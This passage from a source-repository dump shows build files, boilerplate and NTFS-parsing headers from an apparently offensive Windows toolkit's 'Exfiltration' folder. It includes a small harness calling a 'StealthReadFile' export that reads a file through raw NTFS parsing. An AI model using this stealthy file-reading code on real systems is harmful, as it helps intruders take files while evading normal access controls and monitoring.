 85 |       <Optimization>Disabled</Optimization>
 86 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 87 |     </ClCompile>
 88 |     <Link>
 89 |       <SubSystem>Console</SubSystem>
 90 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 91 |       <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
 92 |     </Link>
 93 |   </ItemDefinitionGroup>
 94 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 95 |     <ClCompile>
 96 |       <PrecompiledHeader>Use</PrecompiledHeader>
 97 |       <WarningLevel>Level3</WarningLevel>
 98 |       <Optimization>Disabled</Optimization>
 99 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
100 |     </ClCompile>
101 |     <Link>
102 |       <SubSystem>Console</SubSystem>
103 |       <GenerateDebugInformation>true</GenerateDebugInformation>
104 |       <AdditionalDependencies>secur32.lib;%(AdditionalDependencies)</AdditionalDependencies>
105 |     </Link>
106 |   </ItemDefinitionGroup>
107 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
108 |     <ClCompile>
109 |       <WarningLevel>Level3</WarningLevel>
110 |       <PrecompiledHeader>Use</PrecompiledHeader>
111 |       <Optimization>MaxSpeed</Optimization>
112 |       <FunctionLevelLinking>true</FunctionLevelLinking>
113 |       <IntrinsicFunctions>true</IntrinsicFunctions>
114 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
115 |     </ClCompile>
116 |     <Link>
117 |       <SubSystem>Console</SubSystem>
118 |       <GenerateDebugInformation>true</GenerateDebugInformation>
119 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
120 |       <OptimizeReferences>true</OptimizeReferences>
121 |     </Link>
122 |   </ItemDefinitionGroup>
123 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
124 |     <ClCompile>
125 |       <WarningLevel>Level3</WarningLevel>
126 |       <PrecompiledHeader>Use</PrecompiledHeader>
127 |       <Optimization>MaxSpeed</Optimization>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
131 |     </ClCompile>
132 |     <Link>
133 |       <SubSystem>Console</SubSystem>
134 |       <GenerateDebugInformation>true</GenerateDebugInformation>
135 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
136 |       <OptimizeReferences>true</OptimizeReferences>
137 |     </Link>
138 |   </ItemDefinitionGroup>
139 |   <ItemGroup>
140 |     <Text Include="ReadMe.txt" />
141 |   </ItemGroup>
142 |   <ItemGroup>
143 |     <ClInclude Include="stdafx.h" />
144 |     <ClInclude Include="targetver.h" />
145 |   </ItemGroup>
146 |   <ItemGroup>
147 |     <ClCompile Include="LogonUser.cpp" />
148 |     <ClCompile Include="stdafx.cpp">
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
151 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
152 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
153 |     </ClCompile>
154 |   </ItemGroup>
155 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
156 |   <ImportGroup Label="ExtensionTargets">
157 |   </ImportGroup>
158 | </Project>


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/LogonUser.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="LogonUser.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : LogonUser Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this LogonUser application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your LogonUser application.
 9 | 
10 | 
11 | LogonUser.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | LogonUser.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | LogonUser.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named LogonUser.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // LogonUser.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | #include <stdio.h>
10 | #include <tchar.h>
11 | #include <iostream>
12 | #include <string>
13 | #include <Windows.h>
14 | #include <NTSecAPI.h>
15 | 
16 | 
17 | 
18 | 
19 | 
20 | // TODO: reference additional headers your program requires here
21 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/LogonUser/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     DYNAMIC LINK LIBRARY : logon Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this logon DLL for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your logon application.
 9 | 
10 | 
11 | logon.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | logon.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | logon.cpp
25 |     This is the main DLL source file.
26 | 
27 | 	When created, this DLL does not export any symbols. As a result, it
28 | 	will not produce a .lib file when it is built. If you wish this project
29 | 	to be a project dependency of some other project, you will either need to
30 | 	add code to export some symbols from the DLL so that an export library
31 | 	will be produced, or you can set the Ignore Input Library property to Yes
32 | 	on the General propert page of the Linker folder in the project's Property
33 | 	Pages dialog box.
34 | 
35 | /////////////////////////////////////////////////////////////////////////////
36 | Other standard files:
37 | 
38 | StdAfx.h, StdAfx.cpp
39 |     These files are used to build a precompiled header (PCH) file
40 |     named logon.pch and a precompiled types file named StdAfx.obj.
41 | 
42 | /////////////////////////////////////////////////////////////////////////////
43 | Other notes:
44 | 
45 | AppWizard uses "TODO:" comments to indicate parts of the source code you
46 | should add to or customize.
47 | 
48 | /////////////////////////////////////////////////////////////////////////////
49 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/dllmain.cpp:
--------------------------------------------------------------------------------
 1 | // dllmain.cpp : Defines the entry point for the DLL application.
 2 | #include "stdafx.h"
 3 | 
 4 | BOOL APIENTRY DllMain( HMODULE hModule,
 5 |                        DWORD  ul_reason_for_call,
 6 |                        LPVOID lpReserved
 7 | 					 )
 8 | {
 9 | 	switch (ul_reason_for_call)
10 | 	{
11 | 	case DLL_PROCESS_ATTACH:
12 | 	case DLL_THREAD_ATTACH:
13 | 	case DLL_THREAD_DETACH:
14 | 	case DLL_PROCESS_DETACH:
15 | 		break;
16 | 	}
17 | 	return TRUE;
18 | }
19 | 
20 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/logon.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="logon.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |     <ClCompile Include="dllmain.cpp">
36 |       <Filter>Source Files</Filter>
37 |     </ClCompile>
38 |   </ItemGroup>
39 | </Project>


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // logon.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #define WIN32_LEAN_AND_MEAN             // Exclude rarely-used stuff from Windows headers
11 | // Windows Header Files:
12 | #include "targetver.h"
13 | #include <stdio.h>
14 | #include <tchar.h>
15 | #include <iostream>
16 | #include <string>
17 | #include <fstream>
18 | #include <ostream>
19 | #include <mutex>
20 | #include <Windows.h>
21 | #include <NTSecAPI.h>
22 | 
23 | 
24 | 
25 | // TODO: reference additional headers your program requires here
26 | 


--------------------------------------------------------------------------------
/Exfiltration/LogonUser/LogonUser/logon/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 2012
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTFSParserDLL", "NTFSParserDLL\NTFSParserDLL.vcxproj", "{5E42B778-F231-4797-B7FD-7D5BCA9738D0}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Debug|x64 = Debug|x64
10 | 		Release|Win32 = Release|Win32
11 | 		Release|x64 = Release|x64
12 | 	EndGlobalSection
13 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
14 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.ActiveCfg = Debug|Win32
15 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|Win32.Build.0 = Debug|Win32
16 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Debug|x64.Build.0 = Debug|x64
18 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.ActiveCfg = Release|Win32
19 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|Win32.Build.0 = Release|Win32
20 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.ActiveCfg = Release|x64
21 | 		{5E42B778-F231-4797-B7FD-7D5BCA9738D0}.Release|x64.Build.0 = Release|x64
22 | 	EndGlobalSection
23 | 	GlobalSection(SolutionProperties) = preSolution
24 | 		HideSolutionNode = FALSE
25 | 	EndGlobalSection
26 | EndGlobal
27 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFS.h:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * NTFS include files
 3 |  * 
 4 |  * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>
 5 |  *
 6 |  * This program/include file is free software; you can redistribute it and/or
 7 |  * modify it under the terms of the GNU General Public License as published
 8 |  * by the Free Software Foundation; either version 2 of the License, or
 9 |  * (at your option) any later version.
10 |  *
11 |  * This program/include file is distributed in the hope that it will be
12 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
13 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
14 |  * GNU General Public License for more details.
15 |  */
16 | 
17 | #ifndef __NTFS_H_CYB70289
18 | #define	__NTFS_H_CYB70289
19 | 
20 | #pragma pack(8)
21 | 
22 | #include "NTFS_Common.h"
23 | #include "NTFS_FileRecord.h"
24 | #include "NTFS_Attribute.h"
25 | 
26 | #pragma pack()
27 | 
28 | #endif
29 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.cpp:
--------------------------------------------------------------------------------
 1 | /*
 2 |  * 
 3 |  * Copyright(C) 2013 Joe Bialek Twitter:@JosephBialek
 4 |  *
 5 |  * This program/include file is free software; you can redistribute it and/or
 6 |  * modify it under the terms of the GNU General Public License as published
 7 |  * by the Free Software Foundation; either version 2 of the License, or
 8 |  * (at your option) any later version.
 9 |  *
10 |  * This program/include file is distributed in the hope that it will be
11 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
12 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
13 |  * GNU General Public License for more details.
14 |  */
15 | //
16 | // This code uses libraries released under GPLv2(or later) written by cyb70289 <cyb70289@gmail.com>
17 | 
18 | #include "stdafx.h"
19 | #include "NTFS.h"
20 | #include "NTFS_Attribute.h"
21 | #include "NTFS_Common.h"
22 | #include "NTFS_DataType.h"
23 | #include "NTFS_FileRecord.h"
24 | 
25 | using namespace std;
26 | 
27 | typedef DWORD (CDECL *StealthReadFile_Func)(string, BYTE*, DWORD, ULONGLONG, DWORD*, ULONGLONG*);
28 | 
29 | int _tmain(int argc, _TCHAR* argv[])
30 | {
31 | 	HMODULE parserDLLHandle = LoadLibraryA("NTFSParserDLL.dll");
32 | 	HANDLE procAddress = GetProcAddress(parserDLLHandle, "StealthReadFile");
33 | 
34 | 	StealthReadFile_Func StealthReadFile = (StealthReadFile_Func)procAddress;
35 | 
36 | 	DWORD buffSize = 1024*1024;
37 | 	BYTE* buffer = new BYTE[buffSize];
38 | 	DWORD bytesRead = 0;
39 | 	ULONGLONG bytesLeft = 0;
40 | 	DWORD ret = StealthReadFile("c:\\test\\test.txt", buffer, buffSize, 0, &bytesRead, &bytesLeft);
41 | 
42 | 	cout << "Return value: " << ret << endl;
43 | 
44 | 	ofstream myFile("c:\\test\\test2.txt", ios::out | ios::binary);
45 |     myFile.write((char*)buffer, bytesRead);
46 | 
47 | 	return 0;
48 | }
49 | 
50 | 


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFSParser.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |     <ClInclude Include="NTFS.h">
28 |       <Filter>Header Files</Filter>
29 |     </ClInclude>
30 |     <ClInclude Include="NTFS_Attribute.h">
31 |       <Filter>Header Files</Filter>
32 |     </ClInclude>
33 |     <ClInclude Include="NTFS_Common.h">
34 |       <Filter>Header Files</Filter>
35 |     </ClInclude>
36 |     <ClInclude Include="NTFS_DataType.h">
37 |       <Filter>Header Files</Filter>
38 |     </ClInclude>
39 |     <ClInclude Include="NTFS_FileRecord.h">
40 |       <Filter>Header Files</Filter>
41 |     </ClInclude>
42 |   </ItemGroup>
43 |   <ItemGroup>
44 |     <ClCompile Include="stdafx.cpp">
45 |       <Filter>Source Files</Filter>
46 |     </ClCompile>
47 |     <ClCompile Include="NTFSParser.cpp">
48 |       <Filter>Source Files</Filter>
49 |     </ClCompile>
50 |   </ItemGroup>
51 | </Project>


--------------------------------------------------------------------------------
/Exfiltration/NTFSParser/NTFSParser/NTFS_Common.h:
--------------------------------------------------------------------------------
  1 | /*
  2 |  * NTFS Class common definitions
  3 |  * 
  4 |  * Copyright(C) 2010 cyb70289 <cyb70289@gmail.com>
  5 |  *
  6 |  * This program/include file is free software; you can redistribute it and/or
  7 |  * modify it under the terms of the GNU General Public License as published
  8 |  * by the Free Software Foundation; either version 2 of the License, or
  9 |  * (at your option) any later version.
 10 |  *
 11 |  * This program/include file is distributed in the hope that it will be
 12 |  * useful, but WITHOUT ANY WARRANTY; without even the implied warranty
 13 |  * of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 14 |  * GNU General Public License for more details.
 15 |  */
 16 | 
 17 | #ifndef	__NTFS_COMMON_H_CYB70289
 18 | #define	__NTFS_COMMON_H_CYB70289
 19 | 
 20 | #include <windows.h>
 21 | #include <stdio.h>
 22 | #include <tchar.h>
 23 | #include <crtdbg.h>
 24 | 
 25 | #include "NTFS_DataType.h"
 26 | 
 27 | #define	ATTR_NUMS		16				// Attribute Types count
 28 | #define	ATTR_INDEX(at)	(((at)>>4)-1)	// Attribute Type to Index, eg. 0x10->0, 0x30->2
 29 | #define	ATTR_MASK(at)	(((DWORD)1)<<ATTR_INDEX(at))	// Attribute Bit Mask
 30 | 
 31 | // Bit masks of Attributes
 32 | #define	MASK_STANDARD_INFORMATION	ATTR_MASK(ATTR_TYPE_STANDARD_INFORMATION)
 33 | #define	MASK_ATTRIBUTE_LIST			ATTR_MASK(ATTR_TYPE_ATTRIBUTE_LIST)
 34 | #define	MASK_FILE_NAME				ATTR_MASK(ATTR_TYPE_FILE_NAME)
 35 | #define	MASK_OBJECT_ID				ATTR_MASK(ATTR_TYPE_OBJECT_ID)
 36 | #define	MASK_SECURITY_DESCRIPTOR	ATTR_MASK(ATTR_TYPE_SECURITY_DESCRIPTOR)
 37 | #define	MASK_VOLUME_NAME			ATTR_MASK(ATTR_TYPE_VOLUME_NAME)
 38 | #define	MASK_VOLUME_INFORMATION		ATTR_MASK(ATTR_TYPE_VOLUME_INFORMATION)
 39 | #define	MASK_DATA					ATTR_MASK(ATTR_TYPE_DATA)
 40 | #define	MASK_INDEX_ROOT				ATTR_MASK(ATTR_TYPE_INDEX_ROOT)
 41 | #define	MASK_INDEX_ALLOCATION		ATTR_MASK(ATTR_TYPE_INDEX_ALLOCATION)
 42 | #define	MASK_BITMAP					ATTR_MASK(ATTR_TYPE_BITMAP)
 43 | #define	MASK_REPARSE_POINT			ATTR_MASK(ATTR_TYPE_REPARSE_POINT)
 44 | #define	MASK_EA_INFORMATION			ATTR_MASK(ATTR_TYPE_EA_INFORMATION)
 45 | #define	MASK_EA						ATTR_MASK(ATTR_TYPE_EA)
 46 | #define	MASK_LOGGED_UTILITY_STREAM	ATTR_MASK(ATTR_TYPE_LOGGED_UTILITY_STREAM)
 47 | 
 48 | #define	MASK_ALL					((DWORD)-1)
 49 | 
 50 | #define	NTFS_TRACE(t1)					_RPT0(_CRT_WARN, t1)
 51 | #define	NTFS_TRACE1(t1, t2)				_RPT1(_CRT_WARN, t1, t2)
 52 | #define	NTFS_TRACE2(t1, t2, t3)			_RPT2(_CRT_WARN, t1, t2, t3)
 53 | #define	NTFS_TRACE3(t1, t2, t3, t4)		_RPT3(_CRT_WARN, t1, t2, t3, t4)
 54 | #define	NTFS_TRACE4(t1, t2, t3, t4, t5)	_RPT4(_CRT_WARN, t1, t2, t3, t4, t5)
 55 | 
 56 | // User defined Callback routines to process raw attribute data
 57 | // Set bDiscard to TRUE if this Attribute is to be discarded
 58 | // Set bDiscard to FALSE to let CFileRecord process it
 59 | typedef void (*ATTR_RAW_CALLBACK)(const ATTR_HEADER_COMMON *attrHead, BOOL *bDiscard);
 60 | 
 61 | // User defined Callback routine to handle CFileRecord parsed attributes
 62 | // Will be called by CFileRecord::TraverseAttrs() for each attribute
 63 | // attrClass is the according attribute's wrapping class, CAttr_xxx
 64 | // Set bStop to TRUE if don't want to continue
 65 | // Set bStop to FALSE to continue processing
 66 | class CAttrBase;
 67 | typedef void (*ATTRS_CALLBACK)(const CAttrBase *attr, void *context, BOOL *bStop);
 68 | 
 69 | // User defined Callback routine to handle Directory traversing
 70 | // Will be called by CFileRecord::TraverseSubEntries for each sub entry
 71 | class CIndexEntry;
 72 | typedef void (*SUBENTRY_CALLBACK)(const CIndexEntry *ie);
 73 | 
 74 | 
 75 | // List Entry
 76 | template <class ENTRY_TYPE>
 77 | struct NTSLIST_ENTRY
 78 | {
 79 | 	NTSLIST_ENTRY	*Next;
 80 | 	ENTRY_TYPE		*Entry;
 81 | };
 82 | 
 83 | // List Entry Smart Pointer
 84 | template <class ENTRY_TYPE>
 85 | class CEntrySmartPtr
 86 | {
 87 | public:
 88 | 	CEntrySmartPtr(ENTRY_TYPE *ptr = NULL)
 89 | 	{
 90 | 		EntryPtr = ptr;
 91 | 	}
 92 | 
 93 | 	virtual ~CEntrySmartPtr()
 94 | 	{
 95 | 		if (EntryPtr)
 96 | 			delete EntryPtr;
 97 | 	}
 98 | 
 99 | private:
100 | 	const ENTRY_TYPE *EntryPtr;
101 | 
102 | public:
103 | 	__inline CEntrySmartPtr<ENTRY_TYPE> operator = (const ENTRY_TYPE* ptr)
104 | 	{
105 | 		// Delete previous pointer if allocated
106 | 		if (EntryPtr)
107 | 			delete EntryPtr;
108 | 
109 | 		EntryPtr = ptr;
110 | 
111 | 		return *this;
112 | 	}
113 | 
114 | 	__inline const ENTRY_TYPE* operator->() const
115 | 	{
116 | 		_ASSERT(EntryPtr);
117 | 		return EntryPtr;
118 | 	}
119 | 
120 | 	__inline BOOL IsValid() const
121 | 	{
122 | 		return EntryPtr != NULL;
123 | 	}
124 | };
125 | 
126 | //////////////////////////////////////
127 | // Single list implementation
128 | //////////////////////////////////////
129 | template <class ENTRY_TYPE>
130 | class CSList
131 | {
132 | public:
133 | 	CSList()
134 | 	{
135 | 		ListHead = ListTail = NULL;
136 | 		ListCurrent = NULL;
137 | 		EntryCount = 0;
138 | 	}
139 | 
140 | 	virtual ~CSList()
141 | 	{
142 | 		RemoveAll();
143 | 	}
144 | 
145 | private:
146 | 	int EntryCount;
147 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListHead;
148 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListTail;
149 | 	NTSLIST_ENTRY<ENTRY_TYPE> *ListCurrent;
150 | 
151 | public:
152 | 	// Get entry count
153 | 	__inline int GetCount() const
154 | 	{
155 | 		return EntryCount;
156 | 	}
157 | 
158 | 	// Insert to tail
159 | 	BOOL InsertEntry(ENTRY_TYPE *entry)
160 | 	{
161 | 		NTSLIST_ENTRY<ENTRY_TYPE> *le = new NTSLIST_ENTRY<ENTRY_TYPE>;
162 | 		if (!le)
163 | 			return FALSE;
164 | 
165 | 		le->Entry = entry;
166 | 		le->Next = NULL;
167 | 
168 | 		if (ListTail == NULL)
169 | 			ListHead = le;		// Empty list
170 | 		else
171 | 			ListTail->Next = le;
172 | 
173 | 		ListTail = le;
174 | 
175 | 		EntryCount++;
176 | 		return TRUE;
177 | 	}
178 | 
179 | 	// Remove all entries
180 | 	void RemoveAll()
181 | 	{
182 | 		while (ListHead)
183 | 		{
184 | 			ListCurrent = ListHead->Next;
185 | 			delete ListHead->Entry;
186 | 			delete ListHead;
187 | 
188 | 			ListHead = ListCurrent;
189 | 		}
190 | 
191 | 		ListHead = ListTail = NULL;
192 | 		ListCurrent = NULL;
193 | 		EntryCount = 0;
194 | 	}
195 | 
196 | 	// Find first entry
197 | 	__inline ENTRY_TYPE *FindFirstEntry() const
198 | 	{
199 | 		((CSList<ENTRY_TYPE>*)this)->ListCurrent = ListHead;
200 | 
201 | 		if (ListCurrent)
202 | 			return ListCurrent->Entry;
203 | 		else
204 | 			return NULL;
205 | 	}
206 | 
207 | 	// Find next entry
208 | 	__inline ENTRY_TYPE *FindNextEntry() const
209 | 	{
210 | 		if (ListCurrent)
